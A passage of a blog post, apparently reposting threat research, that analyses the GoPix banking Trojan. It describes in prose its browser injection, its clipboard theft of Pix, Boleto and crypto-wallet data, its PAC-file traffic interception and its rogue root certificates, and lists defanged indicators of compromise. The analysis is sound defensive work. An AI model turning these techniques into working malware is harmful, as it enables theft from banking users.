the full path of the first detected browser from the registry key SOFTWAREMicrosoftWindowsCurrentVersionApp Paths. A significant difference from previously analyzed droppers is that this version encrypts each string using a unique algorithm.<\/p>\n<p>After selecting the browser, the dropper uses direct syscalls to launch the chosen browser process in a suspended state. This allows it to inject the main GoPix shellcode and its parameters into the process. The injected shellcode is tasked with extracting and loading the main GoPix implant directly into memory, subsequently calling its exported <code>main<\/code> function. The parameters passed include the number 1, to trigger the main GoPix function, and the current Process ID, which is that of <code>Explorer.exe<\/code>.<\/p>\n<div id=\"attachment_119191\" style=\"width: 869px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151545\/gopix-banking-trojan17.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119191\" class=\"size-full wp-image-119191\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151545\/gopix-banking-trojan17.png\" alt=\"The dropper uses a syscall instruction and calls the GoPix in-memory implant's main function\" width=\"859\" height=\"228\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151545\/gopix-banking-trojan17.png 859w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151545\/gopix-banking-trojan17-300x80.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151545\/gopix-banking-trojan17-768x204.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151545\/gopix-banking-trojan17-740x196.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151545\/gopix-banking-trojan17-800x212.png 800w\" sizes=\"auto, (max-width: 859px) 100vw, 859px\"><\/a><\/p>\n<p id=\"caption-attachment-119191\" class=\"wp-caption-text\">The dropper uses a syscall instruction and calls the GoPix in-memory implant\u2019s main function<\/p>\n<\/div>\n<h3 id=\"main-gopix-implant\">Main GoPix implant<\/h3>\n<h4 id=\"clipboard-stealing-functionality\">Clipboard stealing functionality<\/h4>\n<p>Boleto banc\u00e1rio was added as one of the targets to the malware\u2019s clipboard stealing and replacing feature. Boleto is a popular payment method in Brazil that functions similarly to an invoice, being the second most popular payment system in the country. It is a standardized document that includes important payment information such as the amount due, due date, and details of the payee. It features a typeable line, which is a sequence of numbers that can be entered in online banking applications to pay. This line is what GoPix targets with its functionality. An example of such a line is \u201c23790.12345 60000.123456 78901.234567 8 76540000010000\u201d.<\/p>\n<div id=\"attachment_119192\" style=\"width: 526px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151632\/gopix-banking-trojan18.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119192\" class=\"size-full wp-image-119192\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151632\/gopix-banking-trojan18.png\" alt=\"Boleto banc\u00e1rio targeted in clipboard-stealing functionality \" width=\"516\" height=\"424\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151632\/gopix-banking-trojan18.png 516w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151632\/gopix-banking-trojan18-300x247.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151632\/gopix-banking-trojan18-426x350.png 426w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151632\/gopix-banking-trojan18-341x280.png 341w\" sizes=\"auto, (max-width: 516px) 100vw, 516px\"><\/a><\/p>\n<p id=\"caption-attachment-119192\" class=\"wp-caption-text\">Boleto banc\u00e1rio targeted in clipboard-stealing functionality<\/p>\n<\/div>\n<p>When GoPix detects a Pix or Boleto transaction, it simply sends this information to the C2. However, when a Bitcoin or Ethereum wallet is copied to the clipboard, the malware replaces the address with one belonging to the threat actor.<\/p>\n<h4 id=\"unique-man-in-the-middle-attack\">Unique man-in-the-middle attack<\/h4>\n<p>PAC (Proxy AutoConfig) files are nothing new; they\u2019ve been used by Brazilian criminals <a href=\"https:\/\/securelist.com\/pac-the-problem-auto-config\/57891\/#2-pac-the-problem-auto-config\" target=\"_blank\" rel=\"noopener\">for over two decades<\/a>, but GoPix takes this to another level. While in the past, criminals used PAC files to redirect victims to a fake phishing page, the purpose of the PAC file in GoPix attacks is to manipulate the traffic while the user navigates the legitimate financial website.<\/p>\n<p>In order to hide which site GoPix wants to intercept, it uses a CRC32 algorithm in the <code>host<\/code> field of the PAC file. It is formatted on the fly using a <code>pf<\/code> configuration file: the items in it determine which proxy the victim will be redirected to. To hide its malicious proxy server, once a connection is opened to the proxy server, the malware enumerates all connections and finds the process that initiated it. It then takes the process executable name CRC32C checksum and compares it with a hardcoded list of browsers\u2019 CRC checksums. If it doesn\u2019t match a known browser, the malware simply terminates the connection.<\/p>\n<div id=\"attachment_119193\" style=\"width: 388px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151717\/gopix-banking-trojan19.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119193\" class=\"size-full wp-image-119193\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151717\/gopix-banking-trojan19.png\" alt=\"PAC file excerpt\" width=\"378\" height=\"355\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151717\/gopix-banking-trojan19.png 378w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151717\/gopix-banking-trojan19-300x282.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151717\/gopix-banking-trojan19-373x350.png 373w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151717\/gopix-banking-trojan19-298x280.png 298w\" sizes=\"auto, (max-width: 378px) 100vw, 378px\"><\/a><\/p>\n<p id=\"caption-attachment-119193\" class=\"wp-caption-text\">PAC file excerpt<\/p>\n<\/div>\n<p>To uncover GoPix targets, we compiled a list of many Brazilian financial institution domains and subdomains, computed their CRC32 checksums, and compared them against GoPix hardcoded values. The table below shows each CRC32 and its target.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>CRC32<\/strong><\/td>\n<td><strong>Target<\/strong><\/td>\n<\/tr>\n<tr>\n<td>8BD688E8<\/td>\n<td>local<\/td>\n<\/tr>\n<tr>\n<td>8CA8ACFF<\/td>\n<td>www2.banco********.com.br<\/td>\n<\/tr>\n<tr>\n<td>AD8F5213<\/td>\n<td>autoatendimento.********.com.br<\/td>\n<\/tr>\n<tr>\n<td>105A3F17<\/td>\n<td>www2.****.com.br<\/td>\n<\/tr>\n<tr>\n<td>B477FE70<\/td>\n<td>internetbanking.*******.gov.br<\/td>\n<\/tr>\n<tr>\n<td>785F39C2<\/td>\n<td>loginx.********.br<\/td>\n<\/tr>\n<tr>\n<td>C72C8593<\/td>\n<td>internetpf.*****.com.br<\/td>\n<\/tr>\n<tr>\n<td>75E3C3BA<\/td>\n<td>internet.*****.com.br<\/td>\n<\/tr>\n<tr>\n<td>FD4E6024<\/td>\n<td>internetbanking.*******.com.br<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4 id=\"https-interception\">HTTPS interception<\/h4>\n<p>Since every communication is encrypted via HTTPS, GoPix bypasses this by injecting a trusted root certificate into the memory of a web browser while on the victim\u2019s machine. This allows the attacker to sniff and even manipulate the victim\u2019s traffic. We have found two certificates across GoPix samples, one that expired in January 2025 and another created in February 2025 that is set to expire in February 2027.<\/p>\n<div id=\"attachment_119194\" style=\"width: 814px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119194\" class=\"size-full wp-image-119194\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20.png\" alt=\"GoPix trusted root certificate\" width=\"804\" height=\"432\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20.png 804w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20-300x161.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20-768x413.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20-651x350.png 651w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20-740x398.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20-521x280.png 521w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151802\/gopix-banking-trojan20-800x430.png 800w\" sizes=\"auto, (max-width: 804px) 100vw, 804px\"><\/a><\/p>\n<p id=\"caption-attachment-119194\" class=\"wp-caption-text\">GoPix trusted root certificate<\/p>\n<\/div>\n<h2 id=\"conclusion\">Conclusion<\/h2>\n<p>With the ability to load its memory-only implant that employs a malicious Proxy AutoConfig (PAC) file and an HTTP server to execute an unprecedented man-in-the-middle attack, GoPix is by far the most advanced banking Trojan of Brazilian origin. The injection of a trusted root certificate into the browser enhances its ability to intercept and manipulate sensitive financial data while maintaining its stealth profile, as the malicious certificate is not visible to operating system tools. Additionally, GoPix has expanded its clipboard monitoring capability by adding Boleto slips to its arsenal, which already includes Pix transactions and cryptowallets addresses.<\/p>\n<p>This is a sophisticated threat, with multiple layers of evasion, persistence, and functionality. The investigation into the malware\u2019s shellcode, dropper, and main module uncovered intricate mechanisms, including process jumping to leverage specific functionalities across processes. This technique, combined with robust string encryption methods applied to both the dropper and main payload, indicates that the threat actor has gone to great lengths to hinder detection. Interestingly enough, attackers adopted the use of a legitimate commercial anti-fraud service to pre-qualify their targets, aiming to avoid sandboxes and security researchers\u2019 investigations. Additionally, the persistence and cleanup mechanisms implemented by the malware enhance its durability during incident response efforts, with very short C2 lifespans.<\/p>\n<p>For further information on GoPix and all technical details, please contact <a href=\"mailto:crimewareintel@kaspersky.com\" target=\"_blank\" rel=\"noopener\">crimewareintel@kaspersky.com<\/a>.<\/p>\n<p>Kaspersky\u2019s products detect this threat as HEUR:Trojan-Banker.Win64.GoPix, Trojan.PowerShell.GoPix, and HEUR:Trojan-Banker.OLE2.GoPix.<\/p>\n<h2 id=\"indicators-of-compromise\">Indicators of compromise<\/h2>\n<p><a href=\"https:\/\/opentip.kaspersky.com\/eb0b4e35a2ba442821e28d617dd2daa2\/results?icid=gl_sl_post-opentip_sm-team_90716e76845db05d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">EB0B4E35A2BA442821E28D617DD2DAA2<\/a> \u2013 NSIS installer<br \/>\nC64AE7C50394799CE02E97288A12FFF \u2013 ZIP archive with an LNK file<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/d3a17cb4cdba724a0021f5076b33a103\/results?icid=gl_sl_post-opentip_sm-team_3692694fad69eb77&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">D3A17CB4CDBA724A0021F5076B33A103<\/a> \u2013 Malware dropper<br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/28c314acc587f1ea5c5666e935db716c\/results?icid=gl_sl_post-opentip_sm-team_85593644b220ddf6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">28C314ACC587F1EA5C5666E935DB716C<\/a> \u2013 Main payload<\/p>\n<p><strong>Malicious Certificate Thumbprint<\/strong><br \/>\n&lt;Name(CN=Root CA 2024)&gt; f110d0bd7f3bd1c7b276dc78154dd21eef953384<br \/>\n&lt;Name(CN=Root CA 2025)&gt; 1b1f85b68e6c9fde709d975a186185c94c0faa51<\/p>\n<p><strong>C2<\/strong><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/paletolife.com\/?icid=gl_sl_post-opentip_sm-team_dcc1da4a357107e3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">paletolife[.]com<\/a><\/p>\n<p><strong>Domains and IPs<\/strong><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/https%3A%2F%2Fcorreioez0ubcfht9i3.lovehomely.com%2F\/?icid=gl_sl_post-opentip_sm-team_4927afec863b4691&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">https:\/\/correioez0ubcfht9i3.lovehomely[.]com\/<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/https%3A%2F%2Fcorreiotwknx9gu315h.lovehomely.com%2F\/?icid=gl_sl_post-opentip_sm-team_c877df8850ac5a00&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">https:\/\/correiotwknx9gu315h.lovehomely[.]com\/<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/http%3A%2F%2Fwebmensagens4bb7.com%2F\/?icid=gl_sl_post-opentip_sm-team_d4535ad75c2f2124&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">http:\/\/webmensagens4bb7[.]com\/<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/https%3A%2F%2Fmydigitalrevival.com%2Fget.php\/?icid=gl_sl_post-opentip_sm-team_9c14c1e5eddef663&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">https:\/\/mydigitalrevival[.]com\/get.php<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/http%3A%2F%2Fb3d0.com%2F1%2F\/?icid=gl_sl_post-opentip_sm-team_8db1902182d6c3e0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">http:\/\/b3d0[.]com\/1\/<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/http%3A%2F%2F4a3d.com%2F1%2F\/?icid=gl_sl_post-opentip_sm-team_eae46cfcc4bd8814&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">http:\/\/4a3d[.]com\/1\/<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/http%3A%2F%2F9de1.com%2F1%2F\/?icid=gl_sl_post-opentip_sm-team_ae79a50b968da36e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">http:\/\/9de1[.]com\/1\/<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/http%3A%2F%2Fef0h.com%2F1%2F\/?icid=gl_sl_post-opentip_sm-team_ee32eb50463e472e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">http:\/\/ef0h[.]com\/1\/<\/a><br \/>\n<a href=\"https:\/\/opentip.kaspersky.com\/http%3A%2F%2Fyogarecap.com%2F1%2F\/?icid=gl_sl_post-opentip_sm-team_9ffdff3d0c8bcb7a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\">http:\/\/yogarecap[.]com\/1\/<\/a><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Introduction GoPix is an advanced persistent threat targeting Brazilian financial institutions\u2019 customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[846,847,90,310,254,240,502,248,844,99,232,233,845,252,311,235,629,257],"tags":[91],"class_list":["post-1930","post","type-post","status-publish","format-standard","hentry","category-boleto","category-brazil","category-cybersecurity","category-defense-evasion","category-dll","category-financial-threats","category-google-chrome","category-great-research","category-internet-banking","category-malware","category-malware-descriptions","category-malware-technologies","category-mitm","category-powershell","category-shellcode","category-trojan-banker","category-whatsapp","category-windows-malware","tag-cybersecurity"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Free real estate: GoPix, the banking Trojan living off your memory - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Free real estate: GoPix, the banking Trojan living off your memory - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"Introduction GoPix is an advanced persistent threat targeting Brazilian financial institutions\u2019 customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-03-16T11:06:05+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"Free real estate: GoPix, the banking Trojan living off your memory\",\"datePublished\":\"2026-03-16T11:06:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/\"},\"wordCount\":2475,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Boleto\",\"Brazil\",\"Cybersecurity\",\"Defense evasion\",\"DLL\",\"Financial threats\",\"Google Chrome\",\"GReAT research\",\"Internet Banking\",\"Malware\",\"Malware descriptions\",\"Malware Technologies\",\"MITM\",\"PowerShell\",\"shellcode\",\"Trojan Banker\",\"WhatsApp\",\"Windows malware\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/\",\"name\":\"Free real estate: GoPix, the banking Trojan living off your memory - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg\",\"datePublished\":\"2026-03-16T11:06:05+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#primaryimage\",\"url\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg\",\"contentUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Free real estate: GoPix, the banking Trojan living off your memory\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Free real estate: GoPix, the banking Trojan living off your memory - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/","og_locale":"en_US","og_type":"article","og_title":"Free real estate: GoPix, the banking Trojan living off your memory - Imperative Business Ventures Limited","og_description":"Introduction GoPix is an advanced persistent threat targeting Brazilian financial institutions\u2019 customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen [&hellip;]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-03-16T11:06:05+00:00","og_image":[{"url":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Free real estate: GoPix, the banking Trojan living off your memory","datePublished":"2026-03-16T11:06:05+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/"},"wordCount":2475,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#primaryimage"},"thumbnailUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg","keywords":["Cybersecurity"],"articleSection":["Boleto","Brazil","Cybersecurity","Defense evasion","DLL","Financial threats","Google Chrome","GReAT research","Internet Banking","Malware","Malware descriptions","Malware Technologies","MITM","PowerShell","shellcode","Trojan Banker","WhatsApp","Windows malware"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/","name":"Free real estate: GoPix, the banking Trojan living off your memory - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#primaryimage"},"thumbnailUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg","datePublished":"2026-03-16T11:06:05+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#primaryimage","url":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg","contentUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/#breadcrumb","itemListElement":[{"@type":"ListI